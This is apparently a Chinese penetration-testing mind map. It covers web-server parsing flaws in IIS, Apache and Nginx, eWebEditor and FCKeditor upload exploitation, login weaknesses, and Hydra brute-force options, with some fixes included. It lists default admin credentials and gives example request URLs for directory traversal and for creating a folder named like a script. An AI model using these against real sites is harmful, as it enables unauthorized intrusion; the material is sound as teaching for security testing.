修改php.ini文件，将cgi.fix_pathinfo的值设置为0;

if ( $fastcgi_script_name ~ ..*/.*php ) {return 403;}# 当匹配到类似test.jpg/a.php的URL时，将返回403错误代码。

nginx.conf.d/下配置文件中增加代码

Nginx

Apache的解析规则为从右到左，若后缀名不可被Apache识别，则继续向左解析

www.xxxx.xxx.com/test.php.php123

www.xxxx.xxx.com/test.php.abc

多后缀且靠右的后缀名不可识别

httpd.conf

伪静态重写类似.php.*这类文件

Apache

服务器默认会把.asp，.asa目录下的文件都解析成asp文件

www.xxx.com/xx.asp/xx.jpg，`xx.asp`为目录名称

权限问题配合上传漏洞一起使用，自动同步权限

目录解析

服务器默认不解析`;`号后面的内容，因此xx.asp;.jpg便被解析成asp文件了

www.xxx.com/xx.asp;.jp

.asp

.asa

.cer

.cdx

支持的解析类型

文件解析

升级

正则过滤

权限设置

修复方案

IIS 5-6

IIS 7.5

IIS

中间件解析漏洞

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框`<TEXTAREA>`替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具！128517;

介绍

默认后台：www.xxxx.com/ewebeditor/admin_login.asp

默认数据库：ewebeditor/db/ewebeditor.mdb

默认账号密码：admin admin/admin888

部署于IIS上，关联解析漏洞

利用核心

样式管理

工具栏

插入图片

低版本IE

IIS应用程序扩展删除.mdb

http://10.0.0.128:1616/admin_uploadfile.asp?id=35&dir=../../xxx #任意目录跳转

版本 2.8.0

漏洞利用关键词

Ewebeditor

创建文件时`.`会转义为`_`

http://10.0.0.128:80/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/est.asp&NewFolderName=x.asp

绕过

FCKeditor

编辑器漏洞

破解前一定要有一个有郊的字典（Top100 TOP2000 csdn QQ 163等密码）

判断用户是否设置了复杂的密码

网站是否存在验证码

尝试登录的行为是否有限制

网站是否双因素认证、Token值等等

暴力破解注意事项

注入点及万能密码登录

不安全的用户提示，一般提示用户名不存在或密码及验证码错误

查看登录页面源代码，是否存在敏感信息泄露

不安全的验证码

在注册帐号的时候是否是否存在不安全的提示

不安全的密码，在注册帐号的时候，密码没有限制复杂度

在暴力破解的时候未限止ip，锁定用户

一个帐号可以在多地登录，没有安全提示

帐号登录之后，应该具备超时功能

任意无限注册帐号

OA、邮件、默认帐号等相关系统，在不是自己注册的情况下，应该在登录之后要强行更改密码

逻辑漏洞，任意密码重置

越权漏洞，纵向，横向越权

数据包含有敏感信息泄露，如cookice

不安全的数据传输，密码为明文，未使用https证书

任意文件下载

登录页面可能产生哪些漏洞

Bruter、hydra等

Client/Server

基于表单的暴力破解

on client常见问题：不安全的前端js实现验证码；不安全的将验证码在cookie中泄露；不安全的将验证码在前端源代码中泄露

on server常见问题：验证码在后台不过期，导致长期使用(php默认session是24分钟过期)；验证码校验不严格，逻辑出现问题；验证码设计的太过简单和有规律的被猜解

弱验证码识别攻击

基于验证码暴力破解

由于token值输出在前端源代码中，容易被获取，因此也就失去了防暴力破解的意义，一般Token在防止CSRF上会有比较好的功郊。

基于Token破解

Browser/Server

暴力破解分类

强制要求输入验证码，否则，必须实施IP策略。注意不要被X-Forwaded-For绕过了！

验证码只能用一次，用完立即过期！不能再次使用

验证码不要太弱。扭曲、变形、干扰线条、干扰背景色、变换字体等。

大网站最好统一安全验证码，各处使用同一个验证码接口。

暴力破解安全防范

Bruter

-R 继续从上一次进度接着破解。

-S 采用SSL链接。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户，对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写，指定密码破解，少用，一般是采用密码字典。

-P FILE 大写，指定密码字典。

-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。

-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数，默认为16。

-w TIME 设置最大超时的时间，单位秒，默认是30s。

-v / -V 显示详细过程。

Hydra的使用

Hydra

暴力猜解密码

漏洞验证

形成报告

渗透测试

 收藏

立即使用

网络安全-WAF绕过

 收藏

立即使用

网络安全-安全加固

 收藏

立即使用

网络安全-安全巡检

 收藏

立即使用

网络安全-应急响应

miralceHuang

职业：网络安全与Java项目经理

去主页





0 条评论

回复删除



取消

下一页